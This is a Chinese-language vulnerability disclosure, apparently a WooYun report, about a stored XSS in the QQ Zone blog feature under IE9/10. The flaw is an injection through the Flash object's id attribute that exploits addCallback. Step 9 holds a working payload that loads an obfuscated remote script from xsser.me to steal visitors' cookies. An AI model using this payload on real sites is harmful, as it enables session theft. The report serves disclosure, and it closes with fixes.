作者:心傷的瘦子
來自:PKAV技術宅社區
網址:http://www.pkav.net
--------------------------------------------------------------------------------------
簡要描述:
有些時候,我們拿現成的XSS代碼都不行,都被過濾了,那麼需要我們對過濾的規則進行一定的判斷與猜測。然後針對性的使用一些技巧來適應或者繞過規則。
在本例中,我們以QQ空間/QQ校友的日誌功能爲例,通過猜測簡單的過濾規則,然後使用含有addCallback的flash,來實現了存儲型XSS的構造。
詳細說明:
1. 前提:本例需在IE9,IE10下進行。
2. 我們烏雲上報告的一些已有案例,進行了再次測試。
WooYun: PKAV騰訊專場 - 6. (QQ空間+朋友網)日誌功能存儲型XSS
上例中,提到了QQ空間日誌並未對object標籤進行有效的過濾。
3. 我們根據此例中的代碼對過濾規則進行測試:
<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">
以上的代碼,是可以正常提交,並且未過濾的。
<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="Src" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">
而當swf的域名不是qzs.qq.com時候,代碼將會被過濾爲以下內容。
<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="AllowScriptAccess" VALUE="always">
即地址被去掉了。
4. 那麼我們已知了這個過濾規則, 就有2種繞過的方式。
4.1 找到一個qzs.qq.com域名下存在缺陷的FLASH,然後加以利用。
此方法,已經在 @gainover 的 WooYun: PKAV騰訊專場 - 6. (QQ空間+朋友網)日誌功能存儲型XSS 有所介紹了。
4.2 利用Flash的addcallback缺陷來構造存儲型XSS。
5. 首先說下flash addcallback方法的基本原理。
根據flash sdk 裏的源代碼,我們可以得到flash addcallback 的源代碼中有以下代碼。
if ((((activeX == true)) && (!((objectID == null))))){
_evalJS((((("__flash__addCallback(document.getElementById(\"" + objectID) + "\"), \"") + functionName) + "\");"));
};
其中objectID爲調用FLASH的HTML標籤的ID。functionName則爲被JS所調用的函數名稱。
6. 當我們有以下代碼時:
<object id="aaaa" width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">
且http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf 中存在一句
ExternalInterface.addCallback("myfunc",funcInFlash);
則有
objectID="aaaa";
functionName="myfunc";
代入上面那句_evalJS中,則有
__flash__addCallback(document.getElementById("aaaa"), "myfunc");
7. 那麼我們可以想象一下,如果 aaaa 替換爲 aaaa"),alert(1),("
則上面代碼變爲
__flash__addCallback(document.getElementById("aaaa"),alert(1),(""), "myfunc");
解析:
8. 且FLASH中,確實未對objectID做任何過濾。 基於以上內容,我們可以構建利用代碼。
<object id='aaaa"),alert(1),("' width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">
我們自己用上面這段代碼先在自己網站上測試下:
看,果然id裏的代碼被執行了!
9. 利用以上原理,接着我們在QQ空間裏來做測試,至於FLASH麼,就是現成的!
雖然這個FLASH裏沒有缺陷,但是存在addCallback的調用,我們就可以直接用它。
<object width="100%" height="100%" align="middle" id="xsstest1"),(function(){if(!window.__x){window.__x=1;window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,101,114,46,109,101,47,66,113,112,57,82,121);document.body.appendChild(window.s);}})(),("" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">
發佈日誌,使用以上代碼
10. 當用戶訪問含有XSS代碼的日誌後,我們可以在xsser.me查看所記錄的cookies內容。
漏洞證明:
見詳細說明,僅IE9, 10 受影響。QQ空間/校友同時受影響。
修復方案:
1. 過濾object標籤
2. 設置allowscriptaccess爲never ,即使設置爲 sameDomain, 也可能找到同域下含有addCallback調用的FLASH。